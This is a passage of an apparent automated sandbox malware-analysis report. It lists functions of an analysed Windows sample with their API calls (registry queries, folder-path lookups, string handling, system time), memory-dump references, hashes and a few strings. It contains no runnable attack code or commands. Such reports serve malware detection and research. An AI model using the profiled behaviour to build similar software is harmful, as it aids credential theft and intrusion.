                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 6325f206e0756f95649eb7e0ab94aa466719a5a4c8fedbb68f2a8726570965aa
                              • Instruction ID: 747ae9c2d1b5d7bcf2b77643b0971fbd204e59a066f9eeb2ebf0640da3f16498
                              • Opcode Fuzzy Hash: 6325f206e0756f95649eb7e0ab94aa466719a5a4c8fedbb68f2a8726570965aa
                              • Instruction Fuzzy Hash: 6441C334A0450ADFCB10DF58D884EAE7BB4FF4A300F114499E9059B250EB71EBA6CF91
                              Function 005A80E0 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A814B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A817A
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8192
                              • lstrlen.KERNEL32(00000000), ref: 005A81D0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A81FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 12019bd4f3934b221122765605f2b1cd6dc0ead9e4c0e5ecfd0b4ccf4cccaade
                              • Instruction ID: bbcb9283b5100b9450ca24462725ebe337c8ff2d2f981a5668406ddbe106de2f
                              • Opcode Fuzzy Hash: 12019bd4f3934b221122765605f2b1cd6dc0ead9e4c0e5ecfd0b4ccf4cccaade
                              • Instruction Fuzzy Hash: A8415975A00206ABCB20DF68D988BBEBFF4FF45700F15851CA85AD7244EB34E941CB90
                              Function 005B1B00 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 005B1B52
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,005BD014), ref: 005B182F
                                • Part of subcall function 005B1800: lstrlen.KERNEL32(015F6ED8), ref: 005B1840
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B1867
                                • Part of subcall function 005B1800: lstrcat.KERNEL32(00000000,00000000), ref: 005B1872
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B18A1
                                • Part of subcall function 005B1800: lstrlen.KERNEL32(005C5568), ref: 005B18B3
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B18D4
                                • Part of subcall function 005B1800: lstrcat.KERNEL32(00000000,005C5568), ref: 005B18E0
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B190F
                              • sscanf.NTDLL ref: 005B1B7A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 005B1B96
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 005B1BA6
                              • ExitProcess.KERNEL32 ref: 005B1BC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              • Opcode ID: f5fd1ca0bb17690102905d42f8f2d5ae062c7c49aa55ee51d0ef303ac51a5ee2
                              • Instruction ID: f7955bdb2d9b7750099ca1316ab7694daf5004c85dbe76910f9507e3e3fdb1df
                              • Opcode Fuzzy Hash: f5fd1ca0bb17690102905d42f8f2d5ae062c7c49aa55ee51d0ef303ac51a5ee2
                              • Instruction Fuzzy Hash: 6421B5B1518301AF8794DF65D88589BBBF8FEC8314F408A1EF599C3224E774E5058B66
                              Function 005B30D0 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005B3106
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B310D
                              • RegOpenKeyExA.ADVAPI32(80000002,015FC7E8,00000000,00020119,?), ref: 005B312C
                              • RegQueryValueExA.ADVAPI32(?,0160DE40,00000000,00000000,00000000,000000FF), ref: 005B3147
                              • RegCloseKey.ADVAPI32(?), ref: 005B3151
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 2ae95ddb99541b6778ae7fbda579a78e7b99a1b7f500cceef068d05bfafd6d6e
                              • Instruction ID: 2aa469562be592bfd2778fe458767b04e4dbcdc51134712193faba2047efc79d
                              • Opcode Fuzzy Hash: 2ae95ddb99541b6778ae7fbda579a78e7b99a1b7f500cceef068d05bfafd6d6e
                              • Instruction Fuzzy Hash: FA114276A40205AFD750CB94DC49FBBBBBCF744711F10456EFA05D3680DB75590087A5
                              Function 005B910D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: cccae4627127f37df22d89464cf7947915c2cd37e1518d00115e5465bbd62387
                              • Instruction ID: c9eaa9185fe6e6eff07efe8ff1a6256bc410cbcd4963384fc9c38dee900304c4
                              • Opcode Fuzzy Hash: cccae4627127f37df22d89464cf7947915c2cd37e1518d00115e5465bbd62387
                              • Instruction Fuzzy Hash: A741E77550479C6EDB218B24CD88FFBBFECBF45304F1444E8EA8686142E271AA45DF20
                              Function 005989B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005989C6
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA205
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA22B
                              • std::_Xinvalid_argument.LIBCPMT ref: 005989FD
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: e575f3de4eabf7a036f521762d310342afd0fa9ccbef7bcb947c680c5d9455ea
                              • Instruction ID: dd0430a62bae7fc53f2bd245c00b58db66197facacd7a51a48657ab6b358fd88
                              • Opcode Fuzzy Hash: e575f3de4eabf7a036f521762d310342afd0fa9ccbef7bcb947c680c5d9455ea
                              • Instruction Fuzzy Hash: 7721A6723006504BCF219A6CE840A7AFB99FBA2761B24093FF152CB681DB71DC41C3E5
                              Function 005B5930 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5942
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5955
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              • API String ID: 1928653953-3304177573
                              • Opcode ID: 61e2fbb662a4ecba1c248ecf8e94c083b45fb5a7d2634553339a04c941c9e6c7
                              • Instruction ID: 88b3e7ed43b8490d51a4844ca0387ea1c985d575d07195070999e939380b0dc6
                              • Opcode Fuzzy Hash: 61e2fbb662a4ecba1c248ecf8e94c083b45fb5a7d2634553339a04c941c9e6c7
                              • Instruction Fuzzy Hash: 5A113031304B41CBD7398B2CE804B597BE1BBD1760F240A5DE0A1D7686E761F845C7A1
                              Function 005B3C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,005BA460,000000FF), ref: 005B3CC0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B3CC7
                              • wsprintfA.USER32 ref: 005B3CD7
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 22ed6948f8bea3c1f2bc6f6fcbbe0f973c0129722a5e279b09038c435f4a684c
                              • Instruction ID: 1f06b3ed0dcb78b6a3d67e9f8e44af12eb9940da6997c663f963bb1c715a26f1
                              • Opcode Fuzzy Hash: 22ed6948f8bea3c1f2bc6f6fcbbe0f973c0129722a5e279b09038c435f4a684c
                              • Instruction Fuzzy Hash: C801D271680704BFE7505B94DC4EF6ABF68FB45B21F008119FA05972D0DBB82D00C7A9
                              Function 005B929D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit$__getptdfree
                              • String ID: Xu\
                              • API String ID: 2640026729-2910533238
                              • Opcode ID: 2a03aba6b69b8a43aa4840360f218fff87de1eab780cb988bdeb0d0097a556e1
                              • Instruction ID: 9958a04dbbc6ca9ca7d4037bca2db4556fe5961984803d7c0ef82f81c3ad4268
                              • Opcode Fuzzy Hash: 2a03aba6b69b8a43aa4840360f218fff87de1eab780cb988bdeb0d0097a556e1
                              • Instruction Fuzzy Hash: 09019231D0AB1AABCB15AB69980ABDEBFA07F88710F140409F91067590CB747D41DFD1
                              Function 00598740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00598767
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: d5414803ae01861e071ddff146e0e7228508a21a514bd5c62ab13d88c680261e
                              • Instruction ID: 9b4f61667a37c376a3713a3531cc025591065d607cb57d04225e3c98c1245d98
                              • Opcode Fuzzy Hash: d5414803ae01861e071ddff146e0e7228508a21a514bd5c62ab13d88c680261e
                              • Instruction Fuzzy Hash: FFF0B427F100320F8754A5BD8D844AEAE47B6E639037AC765E916EF349EC72EC8281D1
                              Function 005AE640 Relevance: 6.2, APIs: 4, Instructions: 157stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AE68B
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE6C0
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE6CC
                              • lstrcat.KERNEL32(?,0160DC80), ref: 005AE6E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
